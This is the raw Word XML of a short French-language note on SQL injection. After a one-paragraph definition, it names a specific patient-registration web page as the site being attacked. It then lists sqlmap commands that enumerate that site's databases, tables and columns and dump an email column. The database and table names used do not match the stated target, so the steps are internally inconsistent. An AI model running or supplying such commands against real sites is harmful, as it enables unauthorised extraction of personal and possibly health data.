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DBBA3F" w14:paraId="50242939" wp14:textId="23B9680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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5EDBBA3F" w:rsidR="5EDBBA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fr-FR"/>
        </w:rPr>
        <w:t>Injection SQL</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="5EDBBA3F" w14:paraId="4756E540" wp14:textId="6BB3F4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Une injection SQL est une forme de cyberattaque lors de laquelle un pirate utilise un morceau de code SQL (« </w:t>
      </w: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Structured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</w:t>
      </w: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Query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</w:t>
      </w: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Language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», langage de requête structurée) pour manipuler une base de données et accéder à des informations potentiellement importantes. C'est l'un des types d'attaques les plus répandus et menaçants, car il peut potentiellement être utilisé pour nuire à n'importe quelle application Web ou n'importe quel site Web qui utilise une base de données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SQL.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</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="5EDBBA3F" w14:paraId="03452CB8" wp14:textId="796C91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https://savelifedata.com/profil_register/patient_register.php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est le site qu’on attaque</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="5EDBBA3F" w14:paraId="74164E60" wp14:textId="6AB12A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sqlmap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-u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https://savelifedata.com/profil_register/patient_register.php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//liste de base de données</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="5EDBBA3F" w14:paraId="6AF3709A" wp14:textId="29F31D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sqlmap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-u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https://savelifedata.com/profil_register/patient_register.php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cuart –tables//affiche les tables</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="5EDBBA3F" w14:paraId="14B49444" wp14:textId="7CCB4B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sqlmap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-u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https://savelifedata.com/profil_register/patient_register.php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cuart -T users –columns//affiche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les tables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qu’on veut</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="5EDBBA3F" w14:paraId="3BFEFB25" wp14:textId="657AC4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sqlmap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-u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https://savelifedata.com/profil_register/patient_register.php </w:t>
      </w:r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-D </w:t>
      </w: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acuart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-T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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artists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -C email --</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_gQ0tnoJP" w:id="2108350877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dump./</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2108350877"/>
      <w:r w:rsidRPr="5EDBBA3F" w:rsidR="5EDBBA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  <w:t>/ affiche le contenu de la table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5EDBBA3F" w:rsidP="5EDBBA3F" w:rsidRDefault="5EDBBA3F" w14:paraId="63340865" w14:textId="3C6461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</w:p>
    <w:p w:rsidR="5EDBBA3F" w:rsidP="5EDBBA3F" w:rsidRDefault="5EDBBA3F" w14:paraId="28FBB5B7" w14:textId="746712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QwYIMwx7ASaVu" int2:id="sZ0rBIeq">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="fNkUjsWlUtv2je" int2:id="y1CrD1B0">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="4RUjxf8j/BYArK" int2:id="UL3TE7fn">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="FPkG0Hw5BGRvSJ" int2:id="O249mH7S">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="W33NFKT6os3VTP" int2:id="XW25pOQC">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="Txsdvt7Jw7mend" int2:id="Tz8RPfST">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="z2Yww7gC9HnjJZ" int2:id="APhkVJeK">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="mgV3Jv+XFmkUeV" int2:id="n4sEZuLU">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="suPTdybvJm6pd7" int2:id="Lh3H8G1F">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="KY/U9wIsdQRJ7c" int2:id="0fxI6CPK">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="zAx43EtEuT6Vli" int2:id="H5lBRtNb">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="lVK/0ZHzjdSySD" int2:id="bKQ2Ao4Y">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="UqY5Hz0hF1nXxT" int2:id="EzSOdwIb">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:bookmark int2:bookmarkName="_Int_gQ0tnoJP" int2:invalidationBookmarkName="" int2:hashCode="eIuGITsJyXXtpV" int2:id="6eWoapd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EF80A7"/>
    <w:rsid w:val="031F0289"/>
    <w:rsid w:val="2EEF80A7"/>
    <w:rsid w:val="3671D39E"/>
    <w:rsid w:val="3E0073D6"/>
    <w:rsid w:val="3F9C4437"/>
    <w:rsid w:val="3F9C4437"/>
    <w:rsid w:val="5EDBBA3F"/>
    <w:rsid w:val="6887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80A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E94E5438-647E-45BC-938E-982422C10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384a972f0d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2022-05-30T13:45:44.1424744Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-30T13:52:30.0273325Z</dcterms:modified>
  <dc:creator>Anish KAPRI</dc:creator>
  <lastModifiedBy>Anish KAPRI</lastModifiedBy>
</coreProperties>
</file>